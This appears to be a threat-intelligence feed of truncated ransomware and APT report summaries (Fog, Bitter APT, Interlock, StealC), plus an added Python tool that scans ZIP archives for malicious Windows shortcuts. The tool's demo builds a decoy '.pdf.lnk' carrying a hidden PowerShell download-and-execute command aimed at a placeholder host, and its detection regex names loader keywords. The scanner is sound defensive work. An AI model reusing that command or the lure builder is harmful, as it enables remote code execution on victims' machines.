In May 2025, an unusual Fog ransomware attack targeted a financial institution in Asia, using tools rarely seen in ransomware intrusions: the legitimate Syteca employee-monitoring software and the open-source pentesting utilities GC2, Adaptix, and Stowaway. The attackers also kept persistence on the network after deploying the ransomware, which points to possible espionage motives beyond the usual extortion objectives. #FogRansomware #Syteca #GC2 #Adaptix #Stowaway

A recently discovered open directory linked to the Fog ransomware group contained various tools and scripts used for cyber intrusions. Initial access was gained through

A targeted social engineering campaign has emerged, with a GitHub repository posing as a coding challenge aimed specifically at Polish-speaking developers. The campaign utilizes a

Fog Ransomware, detected in May 2024, primarily targets educational institutions in the US, employing a double extortion tactic. It utilizes a TOR-based data leak site
Short Summary: Fog ransomware, first detected in May 2024, is a new strain targeting US educational organizations. Darktrace’s investigation revealed a rapid attack cycle, utilizing
Short Summary: The Fog Ransomware group has shifted its focus from targeting educational and recreational sectors to attacking financial services. Adlumin successfully thwarted a ransomware
Summary On May 2, 2024, Arctic Wolf Labs began monitoring deployment of a new ransomware variant referred to as Fog. The ransomware activity was observed

Pakistan Telecommunication Company (PTCL) Targeted by Bitter APT During Heightened Regional Conflict
Bitter APT conducted a spear phishing campaign targeting Pakistan Telecommunication Company Limited employees using stolen credentials from Pakistan’s Counter Terrorism Department, delivering a new variant of the WmRAT remote access trojan. This cyber espionage attack occurred amid India-Pakistan military tensions and aimed to gain persistent access to Pakistan’s critical telecom infrastructure. #BitterAPT #WmRAT #PTCL

Netskope Threat Labs uncovered a complex multi-stage attack chain executed by the DOGE Big Balls ransomware, a variant of Fog ransomware, leveraging custom PowerShell scripts, open-source tools, vulnerable drivers, and the Havoc red team framework. The infection involves sophisticated persistence mechanisms, lateral movement, and credential dumping, often hosted and updated through Netlify, posing significant risks to targeted networks. #DOGEBigBalls #FogRansomware #Havoc #Mimikatz #Rubeus
Introduction Interlock is a ransomware intrusion set first observed in September 2024 that conducts Big Game Hunting and double extortion campaigns. Interlock cannot be classified as a “Ransomware-as-a-Service” (RaaS) group, as no advertisements for recruiting affiliates or information about affiliates had been found as of March 2025. Like many other ransomware groups, Interlock has a […]
The post Interlock ransomware evolving under the radar is an article from the Sekoia.io Blog.

This article details a sophisticated ransomware operation that uses a deceptive ZIP file containing an LNK shortcut to deploy a multi-stage PowerShell-based infection. The attack
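The ZIP-to-LNK-to-PowerShell delivery pattern the snippet above describes can be triaged before anything is opened. The following scanner is an added example, not code from the page or from the article it summarizes: it walks a ZIP archive, parses the StringData section of any Windows shortcut (.lnk) member according to the MS-SHLLINK layout, and flags shortcuts whose target or arguments launch PowerShell or show loader-style options. The sample shortcut, the archive, the `example.invalid` URL and the keyword heuristics are all constructed for the demo and are assumptions, not indicators from the original report.

```python
"""Added example (not from the page or the original article): scan a ZIP for
Windows shortcut (.lnk) members whose target or arguments launch PowerShell,
the ZIP -> LNK -> PowerShell delivery chain described above.
The shortcut bytes and the archive are constructed inline so this runs offline."""
import io
import re
import struct
import zipfile

# Shell Link (MS-SHLLINK) header constants and LinkFlags bits
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Heuristic keywords for a PowerShell launcher (assumption for the demo, not from the page)
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc\w*|-w(indowstyle)?\s+hidden|iex\b|invoke-expression"
    r"|downloadstring|-nop\b|bypass",
    re.IGNORECASE,
)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", re.IGNORECASE)


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList, no LinkInfo) for the demo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))  # attributes, times, size, ...
    body = b""
    for s in (relative_path, arguments):  # StringData order: RELATIVE_PATH, ARGUMENTS
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk, skipping IDList and LinkInfo."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return fields


def scan_zip(zip_bytes: bytes) -> list:
    """Flag .lnk members that look like PowerShell launchers; other members are skipped."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info.filename))
            except ValueError as exc:
                findings.append({"member": info.filename, "verdict": "malformed", "hits": [str(exc)]})
                continue
            hits = {m.group(0).lower() for m in SUSPICIOUS.finditer(" ".join(fields.values()))}
            if DOUBLE_EXT.search(info.filename):
                hits.add("double-extension")
            findings.append({"member": info.filename,
                             "verdict": "suspicious" if hits else "benign",
                             "hits": sorted(hits), "fields": fields})
    return findings


def build_demo_zip() -> bytes:
    """Constructed sample: one lure shortcut plus benign members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2025.pdf.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "-nop -w hidden -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/stage2.ps1')\""))
        zf.writestr("Readme.lnk", build_lnk(r".\README.txt", ""))
        zf.writestr("notes.txt", "plain text, not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_demo_zip()):
        print(f["member"], f["verdict"], f["hits"])
```

The parser deliberately stops after StringData and ignores the ExtraData blocks, which is enough for triage; for a full investigation the EnvironmentVariableDataBlock and the IDList can also carry the real target when the visible path is a decoy, so treat a clean StringData result as "no launcher found here", not "benign".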

StealC is a prominent C++ stealer that has been operational since 2022, with the recent release of version 2 in March 2025. This update introduces